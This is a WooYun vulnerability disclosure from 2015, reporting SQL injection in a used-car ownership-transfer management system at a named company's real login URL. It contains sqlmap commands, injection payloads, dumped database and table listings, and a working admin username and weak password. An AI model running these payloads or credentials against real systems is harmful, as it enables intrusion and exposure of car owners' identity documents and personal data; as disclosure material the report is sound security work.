当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151544

漏洞标题:优信二手车过户管理系统SQL注入(泄露大量车主信息及身份证正反面照片)

相关厂商:xin.com

漏洞作者: hecate

提交时间:2015-11-03 17:05

修复时间:2015-12-19 17:52

公开时间:2015-12-19 17:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经确认,细节仅向厂商公开
2015-11-14: 细节向核心白帽子及相关领域专家公开
2015-11-24: 细节向普通白帽子公开
2015-12-04: 细节向实习白帽子公开
2015-12-19: 细节向公众公开

简要描述:

大量车主信息(姓名/手机/车牌号/合同/身份证正反面照片)

详细说明:

地址 http://wbgh.youxinpai.com/login/
与前面提交的http://wooyun.org/bugs/wooyun-2010-0149556 目测使用的同一套程序

sqlmap -u "http://wbgh.youxinpai.com/login/check/" --data "username=&password=m"


---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: username=-1231' OR 8092=8092#&password=m
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: username=-6771' OR 1 GROUP BY CONCAT(0x7178767a71,(SELECT (CASE WHEN (3647=3647) THEN 1 ELSE 0 END)),0x71717a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=m
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: username=' AND (SELECT * FROM (SELECT(SLEEP(5)))hVQi)#&password=m
---
[15:55:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.14
back-end DBMS: MySQL 5.0.12


获取数据库

current user:   'wbgh_wr@172.16.100.%'
available databases [4]:
[*] AuditDB
[*] information_schema
[*] test
[*] wbgh
Database: wbgh
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| credit_youfen_consume_category | 95080 |
| credit_youfen_consume | 65559 |
| credit_youfen_credittrade | 32144 |
| credit_youfen_consume_city | 29079 |
| credit | 18627 |
| credit_result | 17279 |
| credit_youfen | 7238 |
| credit_zhongzhicheng | 5550 |
| transfer_op | 5449 |
| transfer_img | 3868 |
| credit_digcredit | 3578 |
| transfer_log | 1667 |
| transfer | 1167 |
| transfer_extend | 816 |
| bg_back | 647 |
| area_city | 509 |
| jr_information | 457 |
| picc_back | 244 |
| rbac_masterrole | 146 |
| rbac_master | 97 |
| rbac_actionrole | 87 |
| rbac_action | 52 |
| rbac_log | 33 |
| area_province | 31 |
| area_opencity | 7 |
| area_bigarea | 4 |
| rbac_role | 4 |
| zh_confim | 1 |
+--------------------------------+---------+


密码都是弱口令,解密后为6个0

11.png


随便登录一个 用户名 jinanwb 密码 000000
登录后也存在SQL注入

sqlmap -u "http://wbgh.youxinpai.com/management/car_admit/?opt=search&showstatus=&old_car_no=&car_type=&buyse_order_id=&buyer_phone=&time_type=share&ftime=&etime=&select=%E6%9F%A5%E8%AF%A2" --cookie="你的cookie"
参数 car_type可注入


Screenshot - 2015年11月03日 - 16时57分37秒.png


大量合同 

22.png


大量订单

33.png


订单详情

66.png


高清身份证照片

77.png

漏洞证明:

如上

修复方案:

多给点Rank

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-04 17:50

厂商回复:

非常感谢您的关注和反馈!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-11-04 18:06 | hecate ( 普通白帽子 | Rank:569 漏洞数:89 | ®高级安全工程师 | WooYun认证√)

    @优信 不用谢,有礼物吗